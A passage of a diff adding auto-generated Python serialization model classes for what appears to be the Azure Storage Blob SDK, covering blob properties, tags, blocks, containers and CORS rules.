Required. + :paramtype deleted: bool + :keyword snapshot: Required. + :paramtype snapshot: str + :keyword version_id: + :paramtype version_id: str + :keyword is_current_version: + :paramtype is_current_version: bool + :keyword properties: Required. Properties of a blob. + :paramtype properties: ~azure.storage.blob.models.BlobPropertiesInternal + :keyword metadata: + :paramtype metadata: ~azure.storage.blob.models.BlobMetadata + :keyword blob_tags: Blob tags. + :paramtype blob_tags: ~azure.storage.blob.models.BlobTags + :keyword has_versions_only: + :paramtype has_versions_only: bool + :keyword object_replication_metadata: Dictionary of :code:``. + :paramtype object_replication_metadata: dict[str, str] + """ + super(BlobItemInternal, self).__init__(**kwargs) + self.name = name + self.deleted = deleted + self.snapshot = snapshot + self.version_id = version_id + self.is_current_version = is_current_version + self.properties = properties + self.metadata = metadata + self.blob_tags = blob_tags + self.has_versions_only = has_versions_only + self.object_replication_metadata = object_replication_metadata + + +class BlobMetadata(msrest.serialization.Model): + """BlobMetadata. + + :ivar additional_properties: Unmatched properties from the message are deserialized to this + collection. + :vartype additional_properties: dict[str, str] + :ivar encrypted: + :vartype encrypted: str + """ + + _attribute_map = { + 'additional_properties': {'key': '', 'type': '{str}'}, + 'encrypted': {'key': 'Encrypted', 'type': 'str', 'xml': {'attr': True}}, + } + _xml_map = { + 'name': 'Metadata' + } + + def __init__( + self, + *, + additional_properties: Optional[Dict[str, str]] = None, + encrypted: Optional[str] = None, + **kwargs + ): + """ + :keyword additional_properties: Unmatched properties from the message are deserialized to this + collection. + :paramtype additional_properties: dict[str, str] + :keyword encrypted: + :paramtype encrypted: str + """ + super(BlobMetadata, self).__init__(**kwargs) + self.additional_properties = additional_properties + self.encrypted = encrypted + + +class BlobName(msrest.serialization.Model): + """BlobName. + + :ivar encoded: Indicates if the blob name is encoded. + :vartype encoded: bool + :ivar content: The name of the blob. + :vartype content: str + """ + + _attribute_map = { + 'encoded': {'key': 'Encoded', 'type': 'bool', 'xml': {'name': 'Encoded', 'attr': True}}, + 'content': {'key': 'content', 'type': 'str', 'xml': {'text': True}}, + } + + def __init__( + self, + *, + encoded: Optional[bool] = None, + content: Optional[str] = None, + **kwargs + ): + """ + :keyword encoded: Indicates if the blob name is encoded. + :paramtype encoded: bool + :keyword content: The name of the blob. + :paramtype content: str + """ + super(BlobName, self).__init__(**kwargs) + self.encoded = encoded + self.content = content + + +class BlobPrefix(msrest.serialization.Model): + """BlobPrefix. + + All required parameters must be populated in order to send to Azure. + + :ivar name: Required. + :vartype name: ~azure.storage.blob.models.BlobName + """ + + _validation = { + 'name': {'required': True}, + } + + _attribute_map = { + 'name': {'key': 'Name', 'type': 'BlobName'}, + } + + def __init__( + self, + *, + name: "BlobName", + **kwargs + ): + """ + :keyword name: Required. + :paramtype name: ~azure.storage.blob.models.BlobName + """ + super(BlobPrefix, self).__init__(**kwargs) + self.name = name + + +class BlobPropertiesInternal(msrest.serialization.Model): + """Properties of a blob. + + All required parameters must be populated in order to send to Azure. + + :ivar creation_time: + :vartype creation_time: ~datetime.datetime + :ivar last_modified: Required. + :vartype last_modified: ~datetime.datetime + :ivar etag: Required. + :vartype etag: str + :ivar content_length: Size in bytes. + :vartype content_length: long + :ivar content_type: + :vartype content_type: str + :ivar content_encoding: + :vartype content_encoding: str + :ivar content_language: + :vartype content_language: str + :ivar content_md5: + :vartype content_md5: bytearray + :ivar content_disposition: + :vartype content_disposition: str + :ivar cache_control: + :vartype cache_control: str + :ivar blob_sequence_number: + :vartype blob_sequence_number: long + :ivar blob_type: Possible values include: "BlockBlob", "PageBlob", "AppendBlob". + :vartype blob_type: str or ~azure.storage.blob.models.BlobType + :ivar lease_status: Possible values include: "locked", "unlocked". + :vartype lease_status: str or ~azure.storage.blob.models.LeaseStatusType + :ivar lease_state: Possible values include: "available", "leased", "expired", "breaking", + "broken". + :vartype lease_state: str or ~azure.storage.blob.models.LeaseStateType + :ivar lease_duration: Possible values include: "infinite", "fixed". + :vartype lease_duration: str or ~azure.storage.blob.models.LeaseDurationType + :ivar copy_id: + :vartype copy_id: str + :ivar copy_status: Possible values include: "pending", "success", "aborted", "failed". + :vartype copy_status: str or ~azure.storage.blob.models.CopyStatusType + :ivar copy_source: + :vartype copy_source: str + :ivar copy_progress: + :vartype copy_progress: str + :ivar copy_completion_time: + :vartype copy_completion_time: ~datetime.datetime + :ivar copy_status_description: + :vartype copy_status_description: str + :ivar server_encrypted: + :vartype server_encrypted: bool + :ivar incremental_copy: + :vartype incremental_copy: bool + :ivar destination_snapshot: + :vartype destination_snapshot: str + :ivar deleted_time: + :vartype deleted_time: ~datetime.datetime + :ivar remaining_retention_days: + :vartype remaining_retention_days: int + :ivar access_tier: Possible values include: "P4", "P6", "P10", "P15", "P20", "P30", "P40", + "P50", "P60", "P70", "P80", "Hot", "Cool", "Archive". + :vartype access_tier: str or ~azure.storage.blob.models.AccessTier + :ivar access_tier_inferred: + :vartype access_tier_inferred: bool + :ivar archive_status: Possible values include: "rehydrate-pending-to-hot", + "rehydrate-pending-to-cool". + :vartype archive_status: str or ~azure.storage.blob.models.ArchiveStatus + :ivar customer_provided_key_sha256: + :vartype customer_provided_key_sha256: str + :ivar encryption_scope: The name of the encryption scope under which the blob is encrypted. + :vartype encryption_scope: str + :ivar access_tier_change_time: + :vartype access_tier_change_time: ~datetime.datetime + :ivar tag_count: + :vartype tag_count: int + :ivar expires_on: + :vartype expires_on: ~datetime.datetime + :ivar is_sealed: + :vartype is_sealed: bool + :ivar rehydrate_priority: If an object is in rehydrate pending state then this header is + returned with priority of rehydrate. Valid values are High and Standard. Possible values + include: "High", "Standard". + :vartype rehydrate_priority: str or ~azure.storage.blob.models.RehydratePriority + :ivar last_accessed_on: + :vartype last_accessed_on: ~datetime.datetime + :ivar immutability_policy_expires_on: + :vartype immutability_policy_expires_on: ~datetime.datetime + :ivar immutability_policy_mode: Possible values include: "Mutable", "Unlocked", "Locked". + :vartype immutability_policy_mode: str or ~azure.storage.blob.models.BlobImmutabilityPolicyMode + :ivar legal_hold: + :vartype legal_hold: bool + """ + + _validation = { + 'last_modified': {'required': True}, + 'etag': {'required': True}, + } + + _attribute_map = { + 'creation_time': {'key': 'Creation-Time', 'type': 'rfc-1123'}, + 'last_modified': {'key': 'Last-Modified', 'type': 'rfc-1123'}, + 'etag': {'key': 'Etag', 'type': 'str'}, + 'content_length': {'key': 'Content-Length', 'type': 'long'}, + 'content_type': {'key': 'Content-Type', 'type': 'str'}, + 'content_encoding': {'key': 'Content-Encoding', 'type': 'str'}, + 'content_language': {'key': 'Content-Language', 'type': 'str'}, + 'content_md5': {'key': 'Content-MD5', 'type': 'bytearray'}, + 'content_disposition': {'key': 'Content-Disposition', 'type': 'str'}, + 'cache_control': {'key': 'Cache-Control', 'type': 'str'}, + 'blob_sequence_number': {'key': 'x-ms-blob-sequence-number', 'type': 'long'}, + 'blob_type': {'key': 'BlobType', 'type': 'str'}, + 'lease_status': {'key': 'LeaseStatus', 'type': 'str'}, + 'lease_state': {'key': 'LeaseState', 'type': 'str'}, + 'lease_duration': {'key': 'LeaseDuration', 'type': 'str'}, + 'copy_id': {'key': 'CopyId', 'type': 'str'}, + 'copy_status': {'key': 'CopyStatus', 'type': 'str'}, + 'copy_source': {'key': 'CopySource', 'type': 'str'}, + 'copy_progress': {'key': 'CopyProgress', 'type': 'str'}, + 'copy_completion_time': {'key': 'CopyCompletionTime', 'type': 'rfc-1123'}, + 'copy_status_description': {'key': 'CopyStatusDescription', 'type': 'str'}, + 'server_encrypted': {'key': 'ServerEncrypted', 'type': 'bool'}, + 'incremental_copy': {'key': 'IncrementalCopy', 'type': 'bool'}, + 'destination_snapshot': {'key': 'DestinationSnapshot', 'type': 'str'}, + 'deleted_time': {'key': 'DeletedTime', 'type': 'rfc-1123'}, + 'remaining_retention_days': {'key': 'RemainingRetentionDays', 'type': 'int'}, + 'access_tier': {'key': 'AccessTier', 'type': 'str'}, + 'access_tier_inferred': {'key': 'AccessTierInferred', 'type': 'bool'}, + 'archive_status': {'key': 'ArchiveStatus', 'type': 'str'}, + 'customer_provided_key_sha256': {'key': 'CustomerProvidedKeySha256', 'type': 'str'}, + 'encryption_scope': {'key': 'EncryptionScope', 'type': 'str'}, + 'access_tier_change_time': {'key': 'AccessTierChangeTime', 'type': 'rfc-1123'}, + 'tag_count': {'key': 'TagCount', 'type': 'int'}, + 'expires_on': {'key': 'Expiry-Time', 'type': 'rfc-1123'}, + 'is_sealed': {'key': 'Sealed', 'type': 'bool'}, + 'rehydrate_priority': {'key': 'RehydratePriority', 'type': 'str'}, + 'last_accessed_on': {'key': 'LastAccessTime', 'type': 'rfc-1123'}, + 'immutability_policy_expires_on': {'key': 'ImmutabilityPolicyUntilDate', 'type': 'rfc-1123'}, + 'immutability_policy_mode': {'key': 'ImmutabilityPolicyMode', 'type': 'str'}, + 'legal_hold': {'key': 'LegalHold', 'type': 'bool'}, + } + _xml_map = { + 'name': 'Properties' + } + + def __init__( + self, + *, + last_modified: datetime.datetime, + etag: str, + creation_time: Optional[datetime.datetime] = None, + content_length: Optional[int] = None, + content_type: Optional[str] = None, + content_encoding: Optional[str] = None, + content_language: Optional[str] = None, + content_md5: Optional[bytearray] = None, + content_disposition: Optional[str] = None, + cache_control: Optional[str] = None, + blob_sequence_number: Optional[int] = None, + blob_type: Optional[Union[str, "BlobType"]] = None, + lease_status: Optional[Union[str, "LeaseStatusType"]] = None, + lease_state: Optional[Union[str, "LeaseStateType"]] = None, + lease_duration: Optional[Union[str, "LeaseDurationType"]] = None, + copy_id: Optional[str] = None, + copy_status: Optional[Union[str, "CopyStatusType"]] = None, + copy_source: Optional[str] = None, + copy_progress: Optional[str] = None, + copy_completion_time: Optional[datetime.datetime] = None, + copy_status_description: Optional[str] = None, + server_encrypted: Optional[bool] = None, + incremental_copy: Optional[bool] = None, + destination_snapshot: Optional[str] = None, + deleted_time: Optional[datetime.datetime] = None, + remaining_retention_days: Optional[int] = None, + access_tier: Optional[Union[str, "AccessTier"]] = None, + access_tier_inferred: Optional[bool] = None, + archive_status: Optional[Union[str, "ArchiveStatus"]] = None, + customer_provided_key_sha256: Optional[str] = None, + encryption_scope: Optional[str] = None, + access_tier_change_time: Optional[datetime.datetime] = None, + tag_count: Optional[int] = None, + expires_on: Optional[datetime.datetime] = None, + is_sealed: Optional[bool] = None, + rehydrate_priority: Optional[Union[str, "RehydratePriority"]] = None, + last_accessed_on: Optional[datetime.datetime] = None, + immutability_policy_expires_on: Optional[datetime.datetime] = None, + immutability_policy_mode: Optional[Union[str, "BlobImmutabilityPolicyMode"]] = None, + legal_hold: Optional[bool] = None, + **kwargs + ): + """ + :keyword creation_time: + :paramtype creation_time: ~datetime.datetime + :keyword last_modified: Required. + :paramtype last_modified: ~datetime.datetime + :keyword etag: Required. + :paramtype etag: str + :keyword content_length: Size in bytes. + :paramtype content_length: long + :keyword content_type: + :paramtype content_type: str + :keyword content_encoding: + :paramtype content_encoding: str + :keyword content_language: + :paramtype content_language: str + :keyword content_md5: + :paramtype content_md5: bytearray + :keyword content_disposition: + :paramtype content_disposition: str + :keyword cache_control: + :paramtype cache_control: str + :keyword blob_sequence_number: + :paramtype blob_sequence_number: long + :keyword blob_type: Possible values include: "BlockBlob", "PageBlob", "AppendBlob". + :paramtype blob_type: str or ~azure.storage.blob.models.BlobType + :keyword lease_status: Possible values include: "locked", "unlocked". + :paramtype lease_status: str or ~azure.storage.blob.models.LeaseStatusType + :keyword lease_state: Possible values include: "available", "leased", "expired", "breaking", + "broken". + :paramtype lease_state: str or ~azure.storage.blob.models.LeaseStateType + :keyword lease_duration: Possible values include: "infinite", "fixed". + :paramtype lease_duration: str or ~azure.storage.blob.models.LeaseDurationType + :keyword copy_id: + :paramtype copy_id: str + :keyword copy_status: Possible values include: "pending", "success", "aborted", "failed". + :paramtype copy_status: str or ~azure.storage.blob.models.CopyStatusType + :keyword copy_source: + :paramtype copy_source: str + :keyword copy_progress: + :paramtype copy_progress: str + :keyword copy_completion_time: + :paramtype copy_completion_time: ~datetime.datetime + :keyword copy_status_description: + :paramtype copy_status_description: str + :keyword server_encrypted: + :paramtype server_encrypted: bool + :keyword incremental_copy: + :paramtype incremental_copy: bool + :keyword destination_snapshot: + :paramtype destination_snapshot: str + :keyword deleted_time: + :paramtype deleted_time: ~datetime.datetime + :keyword remaining_retention_days: + :paramtype remaining_retention_days: int + :keyword access_tier: Possible values include: "P4", "P6", "P10", "P15", "P20", "P30", "P40", + "P50", "P60", "P70", "P80", "Hot", "Cool", "Archive". + :paramtype access_tier: str or ~azure.storage.blob.models.AccessTier + :keyword access_tier_inferred: + :paramtype access_tier_inferred: bool + :keyword archive_status: Possible values include: "rehydrate-pending-to-hot", + "rehydrate-pending-to-cool". + :paramtype archive_status: str or ~azure.storage.blob.models.ArchiveStatus + :keyword customer_provided_key_sha256: + :paramtype customer_provided_key_sha256: str + :keyword encryption_scope: The name of the encryption scope under which the blob is encrypted. + :paramtype encryption_scope: str + :keyword access_tier_change_time: + :paramtype access_tier_change_time: ~datetime.datetime + :keyword tag_count: + :paramtype tag_count: int + :keyword expires_on: + :paramtype expires_on: ~datetime.datetime + :keyword is_sealed: + :paramtype is_sealed: bool + :keyword rehydrate_priority: If an object is in rehydrate pending state then this header is + returned with priority of rehydrate. Valid values are High and Standard. Possible values + include: "High", "Standard". + :paramtype rehydrate_priority: str or ~azure.storage.blob.models.RehydratePriority + :keyword last_accessed_on: + :paramtype last_accessed_on: ~datetime.datetime + :keyword immutability_policy_expires_on: + :paramtype immutability_policy_expires_on: ~datetime.datetime + :keyword immutability_policy_mode: Possible values include: "Mutable", "Unlocked", "Locked". + :paramtype immutability_policy_mode: str or + ~azure.storage.blob.models.BlobImmutabilityPolicyMode + :keyword legal_hold: + :paramtype legal_hold: bool + """ + super(BlobPropertiesInternal, self).__init__(**kwargs) + self.creation_time = creation_time + self.last_modified = last_modified + self.etag = etag + self.content_length = content_length + self.content_type = content_type + self.content_encoding = content_encoding + self.content_language = content_language + self.content_md5 = content_md5 + self.content_disposition = content_disposition + self.cache_control = cache_control + self.blob_sequence_number = blob_sequence_number + self.blob_type = blob_type + self.lease_status = lease_status + self.lease_state = lease_state + self.lease_duration = lease_duration + self.copy_id = copy_id + self.copy_status = copy_status + self.copy_source = copy_source + self.copy_progress = copy_progress + self.copy_completion_time = copy_completion_time + self.copy_status_description = copy_status_description + self.server_encrypted = server_encrypted + self.incremental_copy = incremental_copy + self.destination_snapshot = destination_snapshot + self.deleted_time = deleted_time + self.remaining_retention_days = remaining_retention_days + self.access_tier = access_tier + self.access_tier_inferred = access_tier_inferred + self.archive_status = archive_status + self.customer_provided_key_sha256 = customer_provided_key_sha256 + self.encryption_scope = encryption_scope + self.access_tier_change_time = access_tier_change_time + self.tag_count = tag_count + self.expires_on = expires_on + self.is_sealed = is_sealed + self.rehydrate_priority = rehydrate_priority + self.last_accessed_on = last_accessed_on + self.immutability_policy_expires_on = immutability_policy_expires_on + self.immutability_policy_mode = immutability_policy_mode + self.legal_hold = legal_hold + + +class BlobTag(msrest.serialization.Model): + """BlobTag. + + All required parameters must be populated in order to send to Azure. + + :ivar key: Required. + :vartype key: str + :ivar value: Required. + :vartype value: str + """ + + _validation = { + 'key': {'required': True}, + 'value': {'required': True}, + } + + _attribute_map = { + 'key': {'key': 'Key', 'type': 'str'}, + 'value': {'key': 'Value', 'type': 'str'}, + } + _xml_map = { + 'name': 'Tag' + } + + def __init__( + self, + *, + key: str, + value: str, + **kwargs + ): + """ + :keyword key: Required. + :paramtype key: str + :keyword value: Required. + :paramtype value: str + """ + super(BlobTag, self).__init__(**kwargs) + self.key = key + self.value = value + + +class BlobTags(msrest.serialization.Model): + """Blob tags. + + All required parameters must be populated in order to send to Azure. + + :ivar blob_tag_set: Required. + :vartype blob_tag_set: list[~azure.storage.blob.models.BlobTag] + """ + + _validation = { + 'blob_tag_set': {'required': True}, + } + + _attribute_map = { + 'blob_tag_set': {'key': 'BlobTagSet', 'type': '[BlobTag]', 'xml': {'name': 'TagSet', 'wrapped': True, 'itemsName': 'Tag'}}, + } + _xml_map = { + 'name': 'Tags' + } + + def __init__( + self, + *, + blob_tag_set: List["BlobTag"], + **kwargs + ): + """ + :keyword blob_tag_set: Required. + :paramtype blob_tag_set: list[~azure.storage.blob.models.BlobTag] + """ + super(BlobTags, self).__init__(**kwargs) + self.blob_tag_set = blob_tag_set + + +class Block(msrest.serialization.Model): + """Represents a single block in a block blob. It describes the block's ID and size. + + All required parameters must be populated in order to send to Azure. + + :ivar name: Required. The base64 encoded block ID. + :vartype name: str + :ivar size: Required. The block size in bytes. + :vartype size: long + """ + + _validation = { + 'name': {'required': True}, + 'size': {'required': True}, + } + + _attribute_map = { + 'name': {'key': 'Name', 'type': 'str'}, + 'size': {'key': 'Size', 'type': 'long'}, + } + + def __init__( + self, + *, + name: str, + size: int, + **kwargs + ): + """ + :keyword name: Required. The base64 encoded block ID. + :paramtype name: str + :keyword size: Required. The block size in bytes. + :paramtype size: long + """ + super(Block, self).__init__(**kwargs) + self.name = name + self.size = size + + +class BlockList(msrest.serialization.Model): + """BlockList. + + :ivar committed_blocks: + :vartype committed_blocks: list[~azure.storage.blob.models.Block] + :ivar uncommitted_blocks: + :vartype uncommitted_blocks: list[~azure.storage.blob.models.Block] + """ + + _attribute_map = { + 'committed_blocks': {'key': 'CommittedBlocks', 'type': '[Block]', 'xml': {'wrapped': True}}, + 'uncommitted_blocks': {'key': 'UncommittedBlocks', 'type': '[Block]', 'xml': {'wrapped': True}}, + } + + def __init__( + self, + *, + committed_blocks: Optional[List["Block"]] = None, + uncommitted_blocks: Optional[List["Block"]] = None, + **kwargs + ): + """ + :keyword committed_blocks: + :paramtype committed_blocks: list[~azure.storage.blob.models.Block] + :keyword uncommitted_blocks: + :paramtype uncommitted_blocks: list[~azure.storage.blob.models.Block] + """ + super(BlockList, self).__init__(**kwargs) + self.committed_blocks = committed_blocks + self.uncommitted_blocks = uncommitted_blocks + + +class BlockLookupList(msrest.serialization.Model): + """BlockLookupList. + + :ivar committed: + :vartype committed: list[str] + :ivar uncommitted: + :vartype uncommitted: list[str] + :ivar latest: + :vartype latest: list[str] + """ + + _attribute_map = { + 'committed': {'key': 'Committed', 'type': '[str]', 'xml': {'itemsName': 'Committed'}}, + 'uncommitted': {'key': 'Uncommitted', 'type': '[str]', 'xml': {'itemsName': 'Uncommitted'}}, + 'latest': {'key': 'Latest', 'type': '[str]', 'xml': {'itemsName': 'Latest'}}, + } + _xml_map = { + 'name': 'BlockList' + } + + def __init__( + self, + *, + committed: Optional[List[str]] = None, + uncommitted: Optional[List[str]] = None, + latest: Optional[List[str]] = None, + **kwargs + ): + """ + :keyword committed: + :paramtype committed: list[str] + :keyword uncommitted: + :paramtype uncommitted: list[str] + :keyword latest: + :paramtype latest: list[str] + """ + super(BlockLookupList, self).__init__(**kwargs) + self.committed = committed + self.uncommitted = uncommitted + self.latest = latest + + +class ClearRange(msrest.serialization.Model): + """ClearRange. + + All required parameters must be populated in order to send to Azure. + + :ivar start: Required. + :vartype start: long + :ivar end: Required. + :vartype end: long + """ + + _validation = { + 'start': {'required': True}, + 'end': {'required': True}, + } + + _attribute_map = { + 'start': {'key': 'Start', 'type': 'long', 'xml': {'name': 'Start'}}, + 'end': {'key': 'End', 'type': 'long', 'xml': {'name': 'End'}}, + } + _xml_map = { + 'name': 'ClearRange' + } + + def __init__( + self, + *, + start: int, + end: int, + **kwargs + ): + """ + :keyword start: Required. + :paramtype start: long + :keyword end: Required. + :paramtype end: long + """ + super(ClearRange, self).__init__(**kwargs) + self.start = start + self.end = end + + +class ContainerCpkScopeInfo(msrest.serialization.Model): + """Parameter group. + + :ivar default_encryption_scope: Optional. Version 2019-07-07 and later. Specifies the default + encryption scope to set on the container and use for all future writes. + :vartype default_encryption_scope: str + :ivar prevent_encryption_scope_override: Optional. Version 2019-07-07 and newer. If true, + prevents any request from specifying a different encryption scope than the scope set on the + container. + :vartype prevent_encryption_scope_override: bool + """ + + _attribute_map = { + 'default_encryption_scope': {'key': 'DefaultEncryptionScope', 'type': 'str'}, + 'prevent_encryption_scope_override': {'key': 'PreventEncryptionScopeOverride', 'type': 'bool'}, + } + + def __init__( + self, + *, + default_encryption_scope: Optional[str] = None, + prevent_encryption_scope_override: Optional[bool] = None, + **kwargs + ): + """ + :keyword default_encryption_scope: Optional. Version 2019-07-07 and later. Specifies the + default encryption scope to set on the container and use for all future writes. + :paramtype default_encryption_scope: str + :keyword prevent_encryption_scope_override: Optional. Version 2019-07-07 and newer. If true, + prevents any request from specifying a different encryption scope than the scope set on the + container. + :paramtype prevent_encryption_scope_override: bool + """ + super(ContainerCpkScopeInfo, self).__init__(**kwargs) + self.default_encryption_scope = default_encryption_scope + self.prevent_encryption_scope_override = prevent_encryption_scope_override + + +class ContainerItem(msrest.serialization.Model): + """An Azure Storage container. + + All required parameters must be populated in order to send to Azure. + + :ivar name: Required. + :vartype name: str + :ivar deleted: + :vartype deleted: bool + :ivar version: + :vartype version: str + :ivar properties: Required. Properties of a container. + :vartype properties: ~azure.storage.blob.models.ContainerProperties + :ivar metadata: Dictionary of :code:``. + :vartype metadata: dict[str, str] + """ + + _validation = { + 'name': {'required': True}, + 'properties': {'required': True}, + } + + _attribute_map = { + 'name': {'key': 'Name', 'type': 'str'}, + 'deleted': {'key': 'Deleted', 'type': 'bool'}, + 'version': {'key': 'Version', 'type': 'str'}, + 'properties': {'key': 'Properties', 'type': 'ContainerProperties'}, + 'metadata': {'key': 'Metadata', 'type': '{str}'}, + } + _xml_map = { + 'name': 'Container' + } + + def __init__( + self, + *, + name: str, + properties: "ContainerProperties", + deleted: Optional[bool] = None, + version: Optional[str] = None, + metadata: Optional[Dict[str, str]] = None, + **kwargs + ): + """ + :keyword name: Required. + :paramtype name: str + :keyword deleted: + :paramtype deleted: bool + :keyword version: + :paramtype version: str + :keyword properties: Required. Properties of a container. + :paramtype properties: ~azure.storage.blob.models.ContainerProperties + :keyword metadata: Dictionary of :code:``. + :paramtype metadata: dict[str, str] + """ + super(ContainerItem, self).__init__(**kwargs) + self.name = name + self.deleted = deleted + self.version = version + self.properties = properties + self.metadata = metadata + + +class ContainerProperties(msrest.serialization.Model): + """Properties of a container. + + All required parameters must be populated in order to send to Azure. + + :ivar last_modified: Required. + :vartype last_modified: ~datetime.datetime + :ivar etag: Required. + :vartype etag: str + :ivar lease_status: Possible values include: "locked", "unlocked". + :vartype lease_status: str or ~azure.storage.blob.models.LeaseStatusType + :ivar lease_state: Possible values include: "available", "leased", "expired", "breaking", + "broken". + :vartype lease_state: str or ~azure.storage.blob.models.LeaseStateType + :ivar lease_duration: Possible values include: "infinite", "fixed". + :vartype lease_duration: str or ~azure.storage.blob.models.LeaseDurationType + :ivar public_access: Possible values include: "container", "blob". + :vartype public_access: str or ~azure.storage.blob.models.PublicAccessType + :ivar has_immutability_policy: + :vartype has_immutability_policy: bool + :ivar has_legal_hold: + :vartype has_legal_hold: bool + :ivar default_encryption_scope: + :vartype default_encryption_scope: str + :ivar prevent_encryption_scope_override: + :vartype prevent_encryption_scope_override: bool + :ivar deleted_time: + :vartype deleted_time: ~datetime.datetime + :ivar remaining_retention_days: + :vartype remaining_retention_days: int + :ivar is_immutable_storage_with_versioning_enabled: Indicates if version level worm is enabled + on this container. + :vartype is_immutable_storage_with_versioning_enabled: bool + """ + + _validation = { + 'last_modified': {'required': True}, + 'etag': {'required': True}, + } + + _attribute_map = { + 'last_modified': {'key': 'Last-Modified', 'type': 'rfc-1123'}, + 'etag': {'key': 'Etag', 'type': 'str'}, + 'lease_status': {'key': 'LeaseStatus', 'type': 'str'}, + 'lease_state': {'key': 'LeaseState', 'type': 'str'}, + 'lease_duration': {'key': 'LeaseDuration', 'type': 'str'}, + 'public_access': {'key': 'PublicAccess', 'type': 'str'}, + 'has_immutability_policy': {'key': 'HasImmutabilityPolicy', 'type': 'bool'}, + 'has_legal_hold': {'key': 'HasLegalHold', 'type': 'bool'}, + 'default_encryption_scope': {'key': 'DefaultEncryptionScope', 'type': 'str'}, + 'prevent_encryption_scope_override': {'key': 'DenyEncryptionScopeOverride', 'type': 'bool'}, + 'deleted_time': {'key': 'DeletedTime', 'type': 'rfc-1123'}, + 'remaining_retention_days': {'key': 'RemainingRetentionDays', 'type': 'int'}, + 'is_immutable_storage_with_versioning_enabled': {'key': 'ImmutableStorageWithVersioningEnabled', 'type': 'bool'}, + } + + def __init__( + self, + *, + last_modified: datetime.datetime, + etag: str, + lease_status: Optional[Union[str, "LeaseStatusType"]] = None, + lease_state: Optional[Union[str, "LeaseStateType"]] = None, + lease_duration: Optional[Union[str, "LeaseDurationType"]] = None, + public_access: Optional[Union[str, "PublicAccessType"]] = None, + has_immutability_policy: Optional[bool] = None, + has_legal_hold: Optional[bool] = None, + default_encryption_scope: Optional[str] = None, + prevent_encryption_scope_override: Optional[bool] = None, + deleted_time: Optional[datetime.datetime] = None, + remaining_retention_days: Optional[int] = None, + is_immutable_storage_with_versioning_enabled: Optional[bool] = None, + **kwargs + ): + """ + :keyword last_modified: Required. + :paramtype last_modified: ~datetime.datetime + :keyword etag: Required. + :paramtype etag: str + :keyword lease_status: Possible values include: "locked", "unlocked". + :paramtype lease_status: str or ~azure.storage.blob.models.LeaseStatusType + :keyword lease_state: Possible values include: "available", "leased", "expired", "breaking", + "broken". + :paramtype lease_state: str or ~azure.storage.blob.models.LeaseStateType + :keyword lease_duration: Possible values include: "infinite", "fixed". + :paramtype lease_duration: str or ~azure.storage.blob.models.LeaseDurationType + :keyword public_access: Possible values include: "container", "blob". + :paramtype public_access: str or ~azure.storage.blob.models.PublicAccessType + :keyword has_immutability_policy: + :paramtype has_immutability_policy: bool + :keyword has_legal_hold: + :paramtype has_legal_hold: bool + :keyword default_encryption_scope: + :paramtype default_encryption_scope: str + :keyword prevent_encryption_scope_override: + :paramtype prevent_encryption_scope_override: bool + :keyword deleted_time: + :paramtype deleted_time: ~datetime.datetime + :keyword remaining_retention_days: + :paramtype remaining_retention_days: int + :keyword is_immutable_storage_with_versioning_enabled: Indicates if version level worm is + enabled on this container. + :paramtype is_immutable_storage_with_versioning_enabled: bool + """ + super(ContainerProperties, self).__init__(**kwargs) + self.last_modified = last_modified + self.etag = etag + self.lease_status = lease_status + self.lease_state = lease_state + self.lease_duration = lease_duration + self.public_access = public_access + self.has_immutability_policy = has_immutability_policy + self.has_legal_hold = has_legal_hold + self.default_encryption_scope = default_encryption_scope + self.prevent_encryption_scope_override = prevent_encryption_scope_override + self.deleted_time = deleted_time + self.remaining_retention_days = remaining_retention_days + self.is_immutable_storage_with_versioning_enabled = is_immutable_storage_with_versioning_enabled + + +class CorsRule(msrest.serialization.Model): + """CORS is an HTTP feature that enables a web application running under one domain to access resources in another domain. Web browsers implement a security restriction known as same-origin policy that prevents a web page from calling APIs in a different domain; CORS provides a secure way to allow one domain (the origin domain) to call APIs in another domain. + + All required parameters must be populated in order to send to Azure. + + :ivar allowed_origins: Required. The origin domains that are permitted to make a request + against the storage service via CORS. The origin domain is the domain from which the request + originates. Note that the origin must be an exact case-sensitive match with the origin that the + user age sends to the service. You can also use the wildcard character '*' to allow all origin + domains to make requests via CORS. + :vartype allowed_origins: str + :ivar allowed_methods: Required. The methods (HTTP request verbs) that the origin domain may + use for a CORS request. (comma separated). + :vartype allowed_methods: str + :ivar allowed_headers: Required. the request headers that the origin domain may specify on the + CORS request. + :vartype allowed_headers: str + :ivar exposed_headers: Required. The response headers that may be sent in the response to the + CORS request and exposed by the browser to the request issuer. + :vartype exposed_headers: str + :ivar max_age_in_seconds: Required. The maximum amount time that a browser should cache the + preflight OPTIONS request. + :vartype max_age_in_seconds: int + """ + + _validation = { + 'allowed_origins': {'required': True}, + 'allowed_methods': {'required': True}, + 'allowed_headers': {'required': True}, + 'exposed_headers': {'required': True}, + 'max_age_in_seconds': {'required': True, 'minimum': 0}, + } + + _attribute_map = { + 'allowed_origins': {'key': 'AllowedOrigins', 'type': 'str'}, + 'allowed_methods': {'key': 'AllowedMethods', 'type': 'str'}, + 'allowed_headers': {'key': 'AllowedHeaders', 'type': 'str'}, + 'exposed_headers': {'key': 'ExposedHeaders', 'type': 'str'}, + 'max_age_in_seconds': {'key': 'MaxAgeInSeconds', 'type': 'int'}, + } + + def __init__( + self, + *, + allowed_origins: str, + allowed_methods: str, + allowed_headers: str, + exposed_headers: str, + max_age_in_seconds: int, + **kwargs + ): + """ + :keyword allowed_origins: Required. The origin domains that are permitted to make a request + against the storage service via CORS. The origin domain is the domain from which the request + originates. Note that the origin must be an exact case-sensitive match with the origin that the + user age sends to the service. You can also use the wildcard character '*' to allow all origin + domains to make requests via CORS. + :paramtype allowed_origins: str + :keyword allowed_methods: Required. The methods (HTTP request verbs) that the origin domain may + use for a CORS request. (comma separated). + :paramtype allowed_methods: str + :keyword allowed_headers: Required. the request headers that the origin domain may specify on + the CORS request. + :paramtype allowed_headers: str + :keyword exposed_headers: Required. The response headers that may be sent in the response to + the CORS request and exposed by the browser to the request issuer. + :paramtype exposed_headers: str + :keyword max_age_in_seconds: Required. The maximum amount time that a browser should cache the + preflight OPTIONS request. + :paramtype max_age_in_seconds: int + """ + super(CorsRule, self).__init__(**kwargs) + self.allowed_origins = allowed_origins + self.allowed_methods = allowed_methods + self.allowed_headers = allowed_headers + self.exposed_headers = exposed_headers + self.max_age_in_seconds = max_age_in_seconds + + +class CpkInfo(msrest.serialization.Model): + """Parameter group. + + :ivar encryption_key: Optional. Specifies the encryption key to use to encrypt the data + provided in the request. If not specified, encryption is performed with the root account + encryption key. For more information, see Encryption at Rest for Azure Storage Services. + :vartype encryption_key: str + :ivar encryption_key_sha256: The SHA-256 hash of the provided encryption key. Must be 